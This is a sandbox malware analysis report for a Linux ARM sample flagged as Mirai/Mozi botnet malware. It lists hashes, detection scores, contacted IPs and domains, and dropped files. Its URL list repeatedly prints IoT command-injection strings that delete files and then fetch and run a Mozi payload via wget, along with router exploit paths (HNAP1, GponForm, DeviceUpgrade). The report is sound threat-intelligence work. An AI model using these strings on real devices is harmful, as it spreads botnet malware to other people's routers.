MGuvcs6Ocz

Status: finished

Submission Time: 2021-04-25 20:58:13 +02:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
397466
API (Web) ID:
697090
Analysis Started:

2021-04-25 20:58:14 +02:00
Analysis Finished:

2021-04-25 21:09:01 +02:00
MD5:
eec5c6c219535fba3a0492ea8118b397
SHA1:
292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:
12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 41/60

Open Full Report

malicious

Score: 20/37

malicious

Score: 20/29

malicious

IPs

IP	Country	Detection
91.57.107.2	Germany
153.157.9.172	Japan
94.31.145.150	Russian Federation
Click to see the 97 hidden entries
100.182.99.144	United States
110.192.131.42	China
207.67.91.44	United States
74.18.244.100	United States
130.68.74.157	United States
13.219.81.91	United States
157.46.152.22	India
50.10.218.224	United States
157.14.182.109	Japan
172.42.40.243	United States
16.98.151.230	United States
49.0.203.86	Mongolia
178.175.121.49	Montenegro
8.195.49.95	United States
135.233.240.19	United States
163.246.109.119	United States
3.146.148.144	United States
219.47.162.234	Japan
1.207.152.148	China
132.204.24.45	Canada
211.18.19.160	Japan
61.231.92.160	Taiwan; Republic of China (ROC)
65.173.118.23	United States
43.245.138.132	India
139.130.197.234	Australia
138.40.6.32	United Kingdom
175.159.188.41	Hong Kong
57.211.14.243	Belgium
86.104.41.235	Iran (ISLAMIC Republic Of)
105.162.120.29	Kenya
199.125.24.246	United States
114.100.97.125	China
157.245.145.71	United States
119.197.149.98	Korea Republic of
147.22.206.236	United States
170.169.8.221	Mexico
222.48.163.26	China
117.151.233.14	China
198.94.113.247	United States
218.231.43.124	Japan
196.90.229.151	Morocco
114.182.18.144	Japan
208.228.127.61	United States
131.30.249.212	United States
89.61.117.218	Germany
159.0.138.11	Saudi Arabia
9.20.231.34	United States
219.15.149.67	Japan
181.82.14.167	Argentina
129.13.128.214	Germany
31.135.20.186	Poland
135.235.118.101	United States
44.179.175.67	United States
31.246.254.22	Germany
129.61.62.75	United States
115.145.240.169	Korea Republic of
20.219.183.3	United States
175.59.180.182	China
174.166.171.113	United States
167.116.31.50	Uruguay
37.218.12.173	Spain
4.147.62.142	United States
98.117.217.106	United States
9.119.216.229	United States
50.18.249.52	United States
105.23.11.84	Mauritius
177.97.224.43	Brazil
131.194.232.220	United States
33.59.152.55	United States
141.33.224.95	Germany
113.189.251.248	Viet Nam
81.165.231.66	Belgium
219.215.91.164	Japan
126.76.20.8	Japan
134.125.107.194	United States
172.92.207.39	United States
181.20.57.55	Argentina
85.65.154.68	Israel
101.197.152.207	China
217.211.238.79	Sweden
221.34.98.191	Japan
211.169.167.142	Korea Republic of
114.36.89.87	Taiwan; Republic of China (ROC)
58.189.27.210	Japan
117.213.41.118	India
179.67.135.130	Brazil
189.52.247.3	Brazil
187.212.113.5	Mexico
44.9.1.20	United States
120.98.233.8	Taiwan; Republic of China (ROC)
169.208.248.210	Korea Republic of
31.167.14.125	Saudi Arabia
181.100.16.154	Argentina
194.174.210.204	Germany
165.81.92.196	United States
85.140.136.230	Russian Federation
117.196.107.209	India

Domains

Name	IP	Detection
dht.transmissionbt.com	87.98.162.88
bttracker.acc.umu.se	130.239.18.159
router.bittorrent.com	67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com	82.221.103.244
bttracker.debian.org	0.0.0.0

URLs

Name	Detection
http://%s:%d/bin.sh;chmod
http://23.207.67.88:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://79.171.18.106:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
Click to see the 48 hidden entries
http://154.90.79.101:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.76.236.93:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://185.29.123.11:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.40.37.31:80/HNAP1/
http://23.217.112.105:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:5555/UD/act?1
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://45.65.120.55:80/HNAP1/
http://127.0.0.1:80/GponForm/diag_Form?images/
http://81.7.8.12:80/HNAP1/
http://18.228.54.139:80/HNAP1/
http://157.245.223.131:80/HNAP1/
http://133.137.248.191:80/HNAP1/
http://%s:%d/bin.sh
http://146.158.12.4:80/HNAP1/
http://13.226.101.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://166.88.243.237:80/HNAP1/
http://154.201.250.66:80/HNAP1/
http://217.182.243.67:80/HNAP1/
http://99.192.234.217:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://168.184.43.22:37215/ctrlt/DeviceUpgrade_1
http://ipinfo.io/ip
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://schemas.xmlsoap.org/soap/envelope/
http://www.alsa-project.org.
http://HTTP/1.1
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.a;chmod
http://pastebin.ca)
http://127.0.0.1sendcmd
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://%s:%d/Mozi.m
http://www.alsa-project.org/cardinfo-db/
http://schemas.xmlsoap.org/soap/encoding/
http://35.244.243.215:80/HNAP1/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.pastebin.ca.
http://%s:%d/Mozi.a;sh$
http://%s:%d/Mozi.m;
http://www.alsa-project.org/alsa-info.sh

Dropped files

Name	File Type	Hashes
/etc/init.d/mountall.sh	ASCII text	#
/usr/bin/gettext.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped	#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh	ASCII text, with very long lines	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/tmp/.config	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/boot/grub/i386-pc/modinfo.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#

MGuvcs6Ocz

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

MGuvcs6Ocz Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

MGuvcs6Ocz